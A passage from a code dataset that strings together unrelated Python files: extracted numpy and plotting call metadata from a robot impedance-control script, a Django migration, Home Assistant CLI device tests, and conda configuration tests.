"matplotlib.pyplot.subplot"
]
| [((353, 385), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'precision': '(2)'}), '(precision=2)\n', (372, 385), True, 'import numpy as np\n'), ((2012, 2154), 'numpy.array', 'np.array', (['[[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [0, 0, 0,\n Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]]'], {}), '([[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [\n 0, 0, 0, Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]])\n', (2020, 2154), True, 'import numpy as np\n'), ((2301, 2443), 'numpy.array', 'np.array', (['[[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [0, 0, 0,\n Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]]'], {}), '([[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [\n 0, 0, 0, Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]])\n', (2309, 2443), True, 'import numpy as np\n'), ((2564, 2598), 'numpy.array', 'np.array', (['[Mp, Mp, Mp, Mo, Mo, Mo]'], {}), '([Mp, Mp, Mp, Mo, Mo, Mo])\n', (2572, 2598), True, 'import numpy as np\n'), ((2598, 2617), 'numpy.diagflat', 'np.diagflat', (['M_diag'], {}), '(M_diag)\n', (2609, 2617), True, 'import numpy as np\n'), ((2687, 2701), 'numpy.identity', 'np.identity', (['(6)'], {}), '(6)\n', (2698, 2701), True, 'import numpy as np\n'), ((2706, 2720), 'numpy.identity', 'np.identity', (['(6)'], {}), '(6)\n', (2717, 2720), True, 'import numpy as np\n'), ((2729, 2744), 'numpy.identity', 'np.identity', (['(18)'], {}), '(18)\n', (2740, 2744), True, 'import numpy as np\n'), ((3226, 3251), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3234, 3251), True, 'import numpy as np\n'), ((3259, 3284), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3267, 3284), True, 'import numpy as np\n'), ((3292, 3317), 'numpy.zeros', 'np.zeros', (['(3, iterations)'], {}), '((3, iterations))\n', (3300, 3317), True, 'import numpy as np\n'), ((3815, 3840), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3823, 3840), True, 'import numpy as np\n'), ((3848, 3873), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3856, 3873), True, 'import numpy as np\n'), ((3881, 3906), 'numpy.zeros', 'np.zeros', (['(3, iterations)'], {}), '((3, iterations))\n', (3889, 3906), True, 'import numpy as np\n'), ((4409, 4434), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (4417, 4434), True, 'import numpy as np\n'), ((4442, 4467), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (4450, 4467), True, 'import numpy as np\n'), ((4475, 4500), 'numpy.zeros', 'np.zeros', (['(3, iterations)'], {}), '((3, iterations))\n', (4483, 4500), True, 'import numpy as np\n'), ((5055, 5080), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5063, 5080), True, 'import numpy as np\n'), ((5088, 5113), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5096, 5113), True, 'import numpy as np\n'), ((5121, 5146), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5129, 5146), True, 'import numpy as np\n'), ((5755, 5780), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5763, 5780), True, 'import numpy as np\n'), ((5788, 5813), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5796, 5813), True, 'import numpy as np\n'), ((5821, 5846), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5829, 5846), True, 'import numpy as np\n'), ((6455, 6480), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (6463, 6480), True, 'import numpy as np\n'), ((6488, 6513), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (6496, 6513), True, 'import numpy as np\n'), ((6521, 6546), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (6529, 6546), True, 'import numpy as np\n'), ((8604, 8629), 'numpy.append', 'np.append', (['pos_x', 'rel_ori'], {}), '(pos_x, rel_ori)\n', (8613, 8629), True, 'import numpy as np\n'), ((10262, 10302), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', (['quat_curr'], {}), '(quat_curr)\n', (10291, 10302), False, 'import quaternion\n'), ((10317, 10356), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', (['quat_des'], {}), '(quat_des)\n', (10346, 10356), False, 'import quaternion\n'), ((10410, 10450), 'quaternion.from_rotation_matrix', 'quaternion.from_rotation_matrix', (['rel_mat'], {}), '(rel_mat)\n', (10441, 10450), False, 'import quaternion\n'), ((10924, 10938), 'numpy.diagflat', 'np.diagflat', (['E'], {}), '(E)\n', (10935, 10938), True, 'import numpy as np\n'), ((10956, 10974), 'numpy.diagflat', 'np.diagflat', (['E_dot'], {}), '(E_dot)\n', (10967, 10974), True, 'import numpy as np\n'), ((10993, 11012), 'numpy.diagflat', 'np.diagflat', (['E_ddot'], {}), '(E_ddot)\n', (11004, 11012), True, 'import numpy as np\n'), ((11024, 11067), 'numpy.block', 'np.block', (['[E_ddot_diag, E_dot_diag, E_diag]'], {}), '([E_ddot_diag, E_dot_diag, E_diag])\n', (11032, 11067), True, 'import numpy as np\n'), ((12647, 12746), 'numpy.array', 'np.array', (['[[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[1],\n vector[0], 0]]'], {}), '([[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[\n 1], vector[0], 0]])\n', (12655, 12746), True, 'import numpy as np\n'), ((13572, 13588), 'numpy.zeros', 'np.zeros', (['(3, 1)'], {}), '((3, 1))\n', (13580, 13588), True, 'import numpy as np\n'), ((14337, 14371), 'numpy.array', 'np.array', (['[quat.x, quat.y, quat.z]'], {}), '([quat.x, quat.y, quat.z])\n', (14345, 14371), True, 'import numpy as np\n'), ((14453, 14478), 'numpy.dot', 'np.dot', (['Rot_e.T', 'quat_e_e'], {}), '(Rot_e.T, quat_e_e)\n', (14459, 14478), True, 'import numpy as np\n'), ((15770, 15786), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (15781, 15786), True, 'import matplotlib.pyplot as plt\n'), ((15791, 15818), 'matplotlib.pyplot.title', 'plt.title', (['"""External force"""'], {}), "('External force')\n", (15800, 15818), True, 'import matplotlib.pyplot as plt\n'), ((15823, 15874), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'F_ext[2]'], {'label': '"""force z [N]"""'}), "(time_array, F_ext[2], label='force z [N]')\n", (15831, 15874), True, 'import matplotlib.pyplot as plt\n'), ((15879, 15971), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'F_d[2]'], {'label': '"""desired force z [N]"""', 'color': '"""b"""', 'linestyle': '"""dashed"""'}), "(time_array, F_d[2], label='desired force z [N]', color='b',\n linestyle='dashed')\n", (15887, 15971), True, 'import matplotlib.pyplot as plt\n'), ((15971, 15998), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Real time [s]"""'], {}), "('Real time [s]')\n", (15981, 15998), True, 'import matplotlib.pyplot as plt\n'), ((16003, 16015), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (16013, 16015), True, 'import matplotlib.pyplot as plt\n'), ((16022, 16038), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (16033, 16038), True, 'import matplotlib.pyplot as plt\n'), ((16043, 16064), 'matplotlib.pyplot.title', 'plt.title', (['"""Position"""'], {}), "('Position')\n", (16052, 16064), True, 'import matplotlib.pyplot as plt\n'), ((16069, 16118), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p[0, :]'], {'label': '"""true x [m]"""'}), "(time_array, p[0, :], label='true x [m]')\n", (16077, 16118), True, 'import matplotlib.pyplot as plt\n'), ((16124, 16173), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p[1, :]'], {'label': '"""true y [m]"""'}), "(time_array, p[1, :], label='true y [m]')\n", (16132, 16173), True, 'import matplotlib.pyplot as plt\n'), ((16179, 16228), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p[2, :]'], {'label': '"""true z [m]"""'}), "(time_array, p[2, :], label='true z [m]')\n", (16187, 16228), True, 'import matplotlib.pyplot as plt\n'), ((16235, 16325), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p_d[0, :]'], {'label': '"""desired x [m]"""', 'color': '"""b"""', 'linestyle': '"""dashed"""'}), "(time_array, p_d[0, :], label='desired x [m]', color='b', linestyle\n ='dashed')\n", (16243, 16325), True, 'import matplotlib.pyplot as plt\n'), ((16325, 16415), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p_d[1, :]'], {'label': '"""desired y [m]"""', 'color': '"""C1"""', 'linestyle': '"""dashed"""'}), "(time_array, p_d[1, :], label='desired y [m]', color='C1',\n linestyle='dashed')\n", (16333, 16415), True, 'import matplotlib.pyplot as plt\n'), ((16416, 16506), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p_d[2, :]'], {'label': '"""desired z [m]"""', 'color': '"""g"""', 'linestyle': '"""dashed"""'}), "(time_array, p_d[2, :], label='desired z [m]', color='g', linestyle\n ='dashed')\n", (16424, 16506), True, 'import matplotlib.pyplot as plt\n'), ((16506, 16533), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Real time [s]"""'], {}), "('Real time [s]')\n", (16516, 16533), True, 'import matplotlib.pyplot as plt\n'), ((16538, 16550), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (16548, 16550), True, 'import matplotlib.pyplot as plt\n'), ((18369, 18379), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (18377, 18379), True, 'import matplotlib.pyplot as plt\n'), ((18469, 18505), 'rospy.init_node', 'rospy.init_node', (['"""impedance_control"""'], {}), "('impedance_control')\n", (18484, 18505), False, 'import rospy\n'), ((18518, 18528), 'panda_robot.PandaArm', 'PandaArm', ([], {}), '()\n', (18526, 18528), False, 'from panda_robot import PandaArm\n'), ((18563, 18587), 'rospy.Rate', 'rospy.Rate', (['publish_rate'], {}), '(publish_rate)\n', (18573, 18587), False, 'import rospy\n'), ((18825, 18837), 'numpy.zeros', 'np.zeros', (['(18)'], {}), '(18)\n', (18833, 18837), True, 'import numpy as np\n'), ((18854, 18879), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (18862, 18879), True, 'import numpy as np\n'), ((18936, 18961), 'numpy.zeros', 'np.zeros', (['(3, max_num_it)'], {}), '((3, max_num_it))\n', (18944, 18961), True, 'import numpy as np\n'), ((18981, 19006), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (18989, 19006), True, 'import numpy as np\n'), ((19022, 19047), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (19030, 19047), True, 'import numpy as np\n'), ((19069, 19094), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (19077, 19094), True, 'import numpy as np\n'), ((19114, 19139), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (19122, 19139), True, 'import numpy as np\n'), ((19164, 19189), 'numpy.zeros', 'np.zeros', (['(3, max_num_it)'], {}), '((3, max_num_it))\n', (19172, 19189), True, 'import numpy as np\n'), ((7509, 7523), 'numpy.zeros', 'np.zeros', (['size'], {}), '(size)\n', (7517, 7523), True, 'import numpy as np\n'), ((8012, 8028), 'numpy.linalg.inv', 'np.linalg.inv', (['W'], {}), '(W)\n', (8025, 8028), True, 'import numpy as np\n'), ((9462, 9493), 'numpy.append', 'np.append', (['delta_pos', 'delta_ori'], {}), '(delta_pos, delta_ori)\n', (9471, 9493), True, 'import numpy as np\n'), ((10461, 10496), 'quaternion.as_float_array', 'quaternion.as_float_array', (['rel_quat'], {}), '(rel_quat)\n', (10486, 10496), False, 'import quaternion\n'), ((11481, 11503), 'numpy.diagflat', 'np.diagflat', (['lam[6:12]'], {}), '(lam[6:12])\n', (11492, 11503), True, 'import numpy as np\n'), ((11520, 11543), 'numpy.diagflat', 'np.diagflat', (['lam[12:18]'], {}), '(lam[12:18])\n', (11531, 11543), True, 'import numpy as np\n'), ((14189, 14211), 'numpy.dot', 'np.dot', (['Rot_e.T', 'Rot_d'], {}), '(Rot_e.T, Rot_d)\n', (14195, 14211), True, 'import numpy as np\n'), ((14916, 14941), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'h_e'], {}), '(Rot_e_bigdim, h_e)\n', (14922, 14941), True, 'import numpy as np\n'), ((7425, 7486), 'numpy.subtract', 'np.subtract', (['history[:, iteration]', 'history[:, iteration - 1]'], {}), '(history[:, iteration], history[:, iteration - 1])\n', (7436, 7486), True, 'import numpy as np\n'), ((11226, 11244), 'numpy.linalg.inv', 'np.linalg.inv', (['K_v'], {}), '(K_v)\n', (11239, 11244), True, 'import numpy as np\n'), ((11887, 11903), 'numpy.linalg.inv', 'np.linalg.inv', (['M'], {}), '(M)\n', (11900, 11903), True, 'import numpy as np\n'), ((13232, 13246), 'numpy.identity', 'np.identity', (['(3)'], {}), '(3)\n', (13243, 13246), True, 'import numpy as np\n'), ((13480, 13505), 'numpy.dot', 'np.dot', (['K_pt_dot', 'p_delta'], {}), '(K_pt_dot, p_delta)\n', (13486, 13505), True, 'import numpy as np\n'), ((13533, 13559), 'numpy.dot', 'np.dot', (['K_pt_ddot', 'p_delta'], {}), '(K_pt_ddot, p_delta)\n', (13539, 13559), True, 'import numpy as np\n'), ((13614, 13638), 'numpy.dot', 'np.dot', (['K_po_dot', 'quat_e'], {}), '(K_po_dot, quat_e)\n', (13620, 13638), True, 'import numpy as np\n'), ((14955, 14985), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_d_ddot'], {}), '(Rot_e_bigdim, x_d_ddot)\n', (14961, 14985), True, 'import numpy as np\n'), ((15012, 15041), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_d_dot'], {}), '(Rot_e_bigdim, x_d_dot)\n', (15018, 15041), True, 'import numpy as np\n'), ((11200, 11220), 'numpy.linalg.inv', 'np.linalg.inv', (['gamma'], {}), '(gamma)\n', (11213, 11220), True, 'import numpy as np\n'), ((12164, 12178), 'numpy.identity', 'np.identity', (['(6)'], {}), '(6)\n', (12175, 12178), True, 'import numpy as np\n'), ((12851, 12867), 'numpy.zeros', 'np.zeros', (['(3, 3)'], {}), '((3, 3))\n', (12859, 12867), True, 'import numpy as np\n'), ((12869, 12885), 'numpy.zeros', 'np.zeros', (['(3, 3)'], {}), '((3, 3))\n', (12877, 12885), True, 'import numpy as np\n'), ((15221, 15252), 'numpy.dot', 'np.dot', (['Rot_e_bigdim.T', 'alpha_e'], {}), '(Rot_e_bigdim.T, alpha_e)\n', (15227, 15252), True, 'import numpy as np\n'), ((15464, 15480), 'numpy.dot', 'np.dot', (['J.T', 'h_e'], {}), '(J.T, h_e)\n', (15470, 15480), True, 'import numpy as np\n'), ((5424, 5466), 'numpy.sin', 'np.sin', (['(it * T / 4 * 2 * np.pi + np.pi / 2)'], {}), '(it * T / 4 * 2 * np.pi + np.pi / 2)\n', (5430, 5466), True, 'import numpy as np\n'), ((6120, 6166), 'numpy.sin', 'np.sin', (['(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'], {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)\n', (6126, 6166), True, 'import numpy as np\n'), ((6935, 6981), 'numpy.sin', 'np.sin', (['(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'], {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)\n', (6941, 6981), True, 'import numpy as np\n'), ((12202, 12218), 'numpy.linalg.inv', 'np.linalg.inv', (['M'], {}), '(M)\n', (12215, 12218), True, 'import numpy as np\n'), ((12953, 12992), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', (['[R_d, K_pt, R_d.T]'], {}), '([R_d, K_pt, R_d.T])\n', (12972, 12992), True, 'import numpy as np\n'), ((12995, 13034), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', (['[R_e, K_pt, R_e.T]'], {}), '([R_e, K_pt, R_e.T])\n', (13014, 13034), True, 'import numpy as np\n'), ((13666, 13701), 'numpy.append', 'np.append', (['f_delta_t.T', 'm_delta_t.T'], {}), '(f_delta_t.T, m_delta_t.T)\n', (13675, 13701), True, 'import numpy as np\n'), ((13717, 13747), 'numpy.append', 'np.append', (['null.T', 'm_delta_o.T'], {}), '(null.T, m_delta_o.T)\n', (13726, 13747), True, 'import numpy as np\n'), ((15085, 15101), 'numpy.linalg.inv', 'np.linalg.inv', (['M'], {}), '(M)\n', (15098, 15101), True, 'import numpy as np\n'), ((15293, 15320), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_dot'], {}), '(Rot_e_bigdim, x_dot)\n', (15299, 15320), True, 'import numpy as np\n'), ((9388, 9419), 'numpy.append', 'np.append', (['delta_pos', 'delta_ori'], {}), '(delta_pos, delta_ori)\n', (9397, 9419), True, 'import numpy as np\n'), ((11924, 11943), 'numpy.dot', 'np.dot', (['M', 'x_d_ddot'], {}), '(M, x_d_ddot)\n', (11930, 11943), True, 'import numpy as np\n'), ((12265, 12277), 'numpy.dot', 'np.dot', (['a', 'b'], {}), '(a, b)\n', (12271, 12277), True, 'import numpy as np\n'), ((15133, 15160), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_dot'], {}), '(Rot_e_bigdim, x_dot)\n', (15139, 15160), True, 'import numpy as np\n')] |
# Generated by Django 2.2.9 on 2020-01-28 14:50
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("tests", "0009_auto_20200113_1239"),
]
operations = [
migrations.AddField(
model_name="modeltest",
name="datetime_field1",
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
]
| [
"django.db.models.DateTimeField"
]
| [((373, 428), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (393, 428), False, 'from django.db import migrations, models\n')] |
"""Testing Device operations."""
import json
import unittest.mock as mock
from click.testing import CliRunner
import homeassistant_cli.cli as cli
def test_device_list(default_devices) -> None:
"""Test Device List."""
with mock.patch(
'homeassistant_cli.remote.get_devices', return_value=default_devices
):
runner = CliRunner()
result = runner.invoke(
cli.cli,
["--output=json", "device", "list"],
catch_exceptions=False,
)
assert result.exit_code == 0
data = json.loads(result.output)
assert len(data) == 23
def test_device_list_filter(default_devices) -> None:
"""Test Device List."""
with mock.patch(
'homeassistant_cli.remote.get_devices', return_value=default_devices
):
runner = CliRunner()
result = runner.invoke(
cli.cli,
["--output=json", "device", "list", "table"],
catch_exceptions=False,
)
assert result.exit_code == 0
data = json.loads(result.output)
assert len(data) == 2
assert data[0]['name'] == "Kitchen table left"
assert data[1]['name'] == "Kitchen table right"
def test_device_assign(default_areas, default_devices) -> None:
"""Test basic device assign."""
with mock.patch(
'homeassistant_cli.remote.get_devices', return_value=default_devices
):
with mock.patch(
'homeassistant_cli.remote.get_areas', return_value=default_areas
):
with mock.patch(
'homeassistant_cli.remote.assign_area',
return_value={'success': True},
):
runner = CliRunner()
result = runner.invoke(
cli.cli,
["device", "assign", "Kitchen", "Kitchen table left"],
catch_exceptions=False,
)
print(result.output)
assert result.exit_code == 0
expected = (
"Successfully assigned 'Kitchen'"
" to 'Kitchen table left'\n"
)
assert result.output == expected
| [
"json.loads",
"unittest.mock.patch",
"click.testing.CliRunner"
]
| [((234, 319), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_devices"""'], {'return_value': 'default_devices'}), "('homeassistant_cli.remote.get_devices', return_value=default_devices\n )\n", (244, 319), True, 'import unittest.mock as mock\n'), ((348, 359), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (357, 359), False, 'from click.testing import CliRunner\n'), ((561, 586), 'json.loads', 'json.loads', (['result.output'], {}), '(result.output)\n', (571, 586), False, 'import json\n'), ((711, 796), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_devices"""'], {'return_value': 'default_devices'}), "('homeassistant_cli.remote.get_devices', return_value=default_devices\n )\n", (721, 796), True, 'import unittest.mock as mock\n'), ((825, 836), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (834, 836), False, 'from click.testing import CliRunner\n'), ((1047, 1072), 'json.loads', 'json.loads', (['result.output'], {}), '(result.output)\n', (1057, 1072), False, 'import json\n'), ((1325, 1410), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_devices"""'], {'return_value': 'default_devices'}), "('homeassistant_cli.remote.get_devices', return_value=default_devices\n )\n", (1335, 1410), True, 'import unittest.mock as mock\n'), ((1434, 1510), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_areas"""'], {'return_value': 'default_areas'}), "('homeassistant_cli.remote.get_areas', return_value=default_areas)\n", (1444, 1510), True, 'import unittest.mock as mock\n'), ((1551, 1637), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.assign_area"""'], {'return_value': "{'success': True}"}), "('homeassistant_cli.remote.assign_area', return_value={'success':\n True})\n", (1561, 1637), True, 'import unittest.mock as mock\n'), ((1708, 1719), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1717, 1719), False, 'from click.testing import CliRunner\n')] |
# (c) 2012-2014 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
#
# conda is distributed under the terms of the BSD 3-clause license.
# Consult LICENSE.txt or http://opensource.org/licenses/BSD-3-Clause.
import os
from os.path import dirname, join, exists
import unittest
import pytest
import conda.config as config
from conda.utils import get_yaml
from conda.compat import iterkeys
from tests.helpers import run_conda_command
yaml = get_yaml()
# use condarc from source tree to run these tests against
config.rc_path = join(dirname(__file__), 'condarc')
def _get_default_urls():
return ['http://repo.continuum.io/pkgs/free',
'http://repo.continuum.io/pkgs/pro']
config.get_default_urls = _get_default_urls
# unset CIO_TEST. This is a Continuum-internal variable that draws packages from an internal server instead of
# repo.continuum.io
try:
del os.environ['CIO_TEST']
except KeyError:
pass
class TestConfig(unittest.TestCase):
# These tests are mostly to ensure API stability
def __init__(self, *args, **kwargs):
config.rc = config.load_condarc(config.rc_path)
# Otherwise normalization tests will fail if the user is logged into
# binstar.
config.rc['add_binstar_token'] = False
super(TestConfig, self).__init__(*args, **kwargs)
def test_globals(self):
self.assertTrue(config.root_dir)
self.assertTrue(config.pkgs_dirs)
self.assertTrue(config.envs_dirs)
self.assertTrue(config.default_prefix)
self.assertTrue(config.platform)
self.assertTrue(config.subdir)
self.assertTrue(config.arch_name)
self.assertTrue(config.bits in (32, 64))
def test_pkgs_dir_from_envs_dir(self):
root_dir = config.root_dir
root_pkgs = join(root_dir, 'pkgs')
for pi, po in [
(join(root_dir, 'envs'), root_pkgs),
('/usr/local/foo/envs' if config.platform != 'win' else 'C:\envs',
'/usr/local/foo/envs/.pkgs' if config.platform != 'win' else 'C:\envs\.pkgs'),
]:
self.assertEqual(config.pkgs_dir_from_envs_dir(pi), po)
def test_proxy_settings(self):
self.assertEqual(config.get_proxy_servers(),
{'http': 'http://user:[email protected]:8080',
'https': 'https://user:[email protected]:8080'})
def test_normalize_urls(self):
current_platform = config.subdir
assert config.DEFAULT_CHANNEL_ALIAS == 'https://conda.anaconda.org/'
assert config.rc.get('channel_alias') == 'https://your.repo/'
for channel in iterkeys(config.normalize_urls(['defaults', 'system',
'https://anaconda.org/username', 'file:///Users/username/repo',
'username'])):
assert (channel.endswith('/%s/' % current_platform) or
channel.endswith('/noarch/'))
self.assertEqual(config.normalize_urls([
'defaults', 'system', 'https://conda.anaconda.org/username',
'file:///Users/username/repo', 'username'
], 'osx-64'),
{'file:///Users/username/repo/noarch/': ('file:///Users/username/repo', 6),
'file:///Users/username/repo/osx-64/': ('file:///Users/username/repo', 6),
'http://repo.continuum.io/pkgs/free/noarch/': (None, 1),
'http://repo.continuum.io/pkgs/free/osx-64/': (None, 1),
'http://repo.continuum.io/pkgs/pro/noarch/': (None, 1),
'http://repo.continuum.io/pkgs/pro/osx-64/': (None, 1),
'http://some.custom/channel/noarch/': ('http://some.custom/channel', 3),
'http://some.custom/channel/osx-64/': ('http://some.custom/channel', 3),
'https://conda.anaconda.org/username/noarch/': ('https://conda.anaconda.org/username', 5),
'https://conda.anaconda.org/username/osx-64/': ('https://conda.anaconda.org/username', 5),
'https://your.repo/binstar_username/noarch/': ('binstar_username', 2),
'https://your.repo/binstar_username/osx-64/': ('binstar_username', 2),
'https://your.repo/username/noarch/': ('username', 7),
'https://your.repo/username/osx-64/': ('username', 7)})
test_condarc = os.path.join(os.path.dirname(__file__), 'test_condarc')
def _read_test_condarc():
with open(test_condarc) as f:
return f.read()
# Tests for the conda config command
# FIXME This shoiuld be multiple individual tests
@pytest.mark.slow
def test_config_command_basics():
try:
# Test that creating the file adds the defaults channel
assert not os.path.exists('test_condarc')
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- test
- defaults
"""
os.unlink(test_condarc)
# When defaults is explicitly given, it should not be added
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test', '--add', 'channels', 'defaults')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- defaults
- test
"""
os.unlink(test_condarc)
# Duplicate keys should not be added twice
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
assert stdout == stderr == ''
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
assert stdout == ''
assert stderr == "Skipping channels: test, item already exists"
assert _read_test_condarc() == """\
channels:
- test
- defaults
"""
os.unlink(test_condarc)
# Test creating a new file with --set
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'always_yes', 'true')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
always_yes: true
"""
os.unlink(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_get():
try:
# Test --get
with open(test_condarc, 'w') as f:
f.write("""\
channels:
- test
- defaults
create_default_packages:
- ipython
- numpy
changeps1: no
always_yes: true
invalid_key: yes
channel_alias: http://alpha.conda.anaconda.org
""")
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get')
assert stdout == """\
--set always_yes True
--set changeps1 no
--set channel_alias http://alpha.conda.anaconda.org
--add channels 'defaults'
--add channels 'test'
--add create_default_packages 'numpy'
--add create_default_packages 'ipython'\
"""
assert stderr == "unknown key invalid_key"
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'channels')
assert stdout == """\
--add channels 'defaults'
--add channels 'test'\
"""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'changeps1')
assert stdout == """\
--set changeps1 no\
"""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'changeps1', 'channels')
assert stdout == """\
--set changeps1 no
--add channels 'defaults'
--add channels 'test'\
"""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'allow_softlinks')
assert stdout == ""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'track_features')
assert stdout == ""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'invalid_key')
assert stdout == ""
assert "invalid choice: 'invalid_key'" in stderr
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'not_valid_key')
assert stdout == ""
assert "invalid choice: 'not_valid_key'" in stderr
os.unlink(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_parser():
try:
# Now test the YAML "parser"
# Channels is normal content.
# create_default_packages has extra spaces in list items
condarc = """\
channels:
- test
- defaults
create_default_packages :
- ipython
- numpy
changeps1: false
# Here is a comment
always_yes: yes
"""
# First verify that this itself is valid YAML
assert yaml.load(condarc, Loader=yaml.RoundTripLoader) == {'channels': ['test', 'defaults'],
'create_default_packages': ['ipython', 'numpy'], 'changeps1':
False, 'always_yes': 'yes'}
with open(test_condarc, 'w') as f:
f.write(condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get')
assert stdout == """\
--set always_yes yes
--set changeps1 False
--add channels 'defaults'
--add channels 'test'
--add create_default_packages 'numpy'
--add create_default_packages 'ipython'\
"""
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'mychannel')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- mychannel
- test
- defaults
create_default_packages:
- ipython
- numpy
changeps1: false
